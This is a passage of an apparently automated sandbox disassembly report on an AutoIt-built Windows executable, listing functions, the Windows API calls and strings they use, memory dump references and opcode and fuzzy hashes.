                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: 3, 3, 16, 1
                                      • API String ID: 176396367-3042988571
                                      • Opcode ID: 0a99640cdcf05ac8b5cc50a752b0df0b2580b960fd0dafab99f0cef80ebb2b29
                                      • Instruction ID: b2b56caf45c63fd81483a4e21a25e0c375a968a9798cb4e6a3f65d326e778c8b
                                      • Opcode Fuzzy Hash: 0a99640cdcf05ac8b5cc50a752b0df0b2580b960fd0dafab99f0cef80ebb2b29
                                      • Instruction Fuzzy Hash: 49E0230160425014D23116BD9CC197FEA8FDFC67707141417F541C11B6D6D49DA153A1
                                      Function 008E0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008E0B23
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Message
                                      • String ID: AutoIt$Error allocating memory.
                                      • API String ID: 2030045667-4017498283
                                      • Opcode ID: 5f8519a25489529df7bf0a767787d209fab278eac4df85ef023cfa7fd3e5bab6
                                      • Instruction ID: 129c023964bbc97d466e1c739f84133fdeafa0d8ceb606d3ddd5a499b387fa7a
                                      • Opcode Fuzzy Hash: 5f8519a25489529df7bf0a767787d209fab278eac4df85ef023cfa7fd3e5bab6
                                      • Instruction Fuzzy Hash: 9FE0D87138430827D61436987C03FC97A84EF06F64F100426F788D54C38AD124A046EA
                                      Function 008A0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0089F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(00950A88,00000000,00950A74,008A0D71,?,?,?,0088100A), ref: 0089F7CE
                                      • IsDebuggerPresent.KERNEL32(?,?,?,0088100A), ref: 008A0D75
                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0088100A), ref: 008A0D84
                                      Strings
                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 008A0D7F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                      • API String ID: 55579361-631824599
                                      • Opcode ID: cbc9ea3f8d707a8bea0e31b6bc16d40848517788357cc516dfc03a9666061ce4
                                      • Instruction ID: 858de6bc4cb7886977dec4ff5791ec0c84bc6b742438e308002f65a347aa43e0
                                      • Opcode Fuzzy Hash: cbc9ea3f8d707a8bea0e31b6bc16d40848517788357cc516dfc03a9666061ce4
                                      • Instruction Fuzzy Hash: B5E039B4300B418BE760AFB9D8083827BE0FB01744F008A2DE496C6A51DBB4E4889F91
                                      Function 008F3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 008F302F
                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 008F3044
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Temp$FileNamePath
                                      • String ID: aut
                                      • API String ID: 3285503233-3010740371
                                      • Opcode ID: d956a4f05168da77cbdcea67d25475d8a22ad495ff36b8ba6e3e594c4bf9760c
                                      • Instruction ID: ad97d7be42f29562091e994c69c245cfcf6b92f68703903489f38d15e4d6ce30
                                      • Opcode Fuzzy Hash: d956a4f05168da77cbdcea67d25475d8a22ad495ff36b8ba6e3e594c4bf9760c
                                      • Instruction Fuzzy Hash: A6D05EF264032877DA20A7A4AC0EFCB3A6CDB05750F4006A1B665E2095DAF0D984CAD0
                                      Function 008DD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: %.3d$X64
                                      • API String ID: 481472006-1077770165
                                      • Opcode ID: a285fa56b49a49c273eebbf2952c303f1a63fa50f4c5fe1aaa7ae68eb5c62708
                                      • Instruction ID: 50175b850b05d8bb2a962eb13cb5a376e2040ad72c5badef5c79e798a2956e84
                                      • Opcode Fuzzy Hash: a285fa56b49a49c273eebbf2952c303f1a63fa50f4c5fe1aaa7ae68eb5c62708
                                      • Instruction Fuzzy Hash: 4FD012A184830CEACF50AAD0DC45CF9B37CFB18345F548553F906D1141E634E508A761
                                      Function 00912322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0091232C
                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0091233F
                                        • Part of subcall function 008EE97B: Sleep.KERNEL32 ref: 008EE9F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: 1a6845b75b820609abe2eb995d42eef322d53c38acae3c4f0ca273c43968de70
                                      • Instruction ID: ecf3705ab176e1a9325e8e1e2305506606482e8d436c182372f6bb97de52c1ad
                                      • Opcode Fuzzy Hash: 1a6845b75b820609abe2eb995d42eef322d53c38acae3c4f0ca273c43968de70
                                      • Instruction Fuzzy Hash: 26D022B23E8300BBE364B370DC0FFC6BA04AB00B00F0089067705EA0D0C8F0A801CB00
                                      Function 00912356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0091236C
                                      • PostMessageW.USER32(00000000), ref: 00912373
                                        • Part of subcall function 008EE97B: Sleep.KERNEL32 ref: 008EE9F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: effae3d46096d56f0bd0c9c97972cd0d50e6f8654f6d161b96affb1a8b66a0bd
                                      • Instruction ID: 9dbd0f26a458e77275f534af68bbbc6ec7c26ea8b04cb29d312067ca6aec3128
                                      • Opcode Fuzzy Hash: effae3d46096d56f0bd0c9c97972cd0d50e6f8654f6d161b96affb1a8b66a0bd
                                      • Instruction Fuzzy Hash: 1ED0A9B23D83007AE264B370DC0FFC6AA04AB01B00F0089067601EA0D0C8B0A801CA04